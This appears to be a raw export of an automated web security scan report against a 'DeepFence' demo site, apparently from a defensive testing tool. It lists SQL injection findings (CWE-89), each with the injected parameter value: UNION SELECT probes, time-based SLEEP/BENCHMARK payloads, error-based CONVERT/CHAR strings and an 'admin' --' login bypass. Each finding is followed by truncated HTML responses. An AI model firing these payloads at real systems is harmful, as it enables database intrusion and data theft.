Value\nDemoUser1# \"-\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1661\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1662\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin' --\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1663\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1664\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1665\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1666\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1667\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1668\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 1) or sleep(5)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1669\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK\n(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1670\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+\nCHAR(88)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1671\nScan SQL InjectionSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1672\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AS INJECTX WHERE 1=1 AND 1=0\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1673\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1674\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# benchmark(50000000,MD5(1))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" 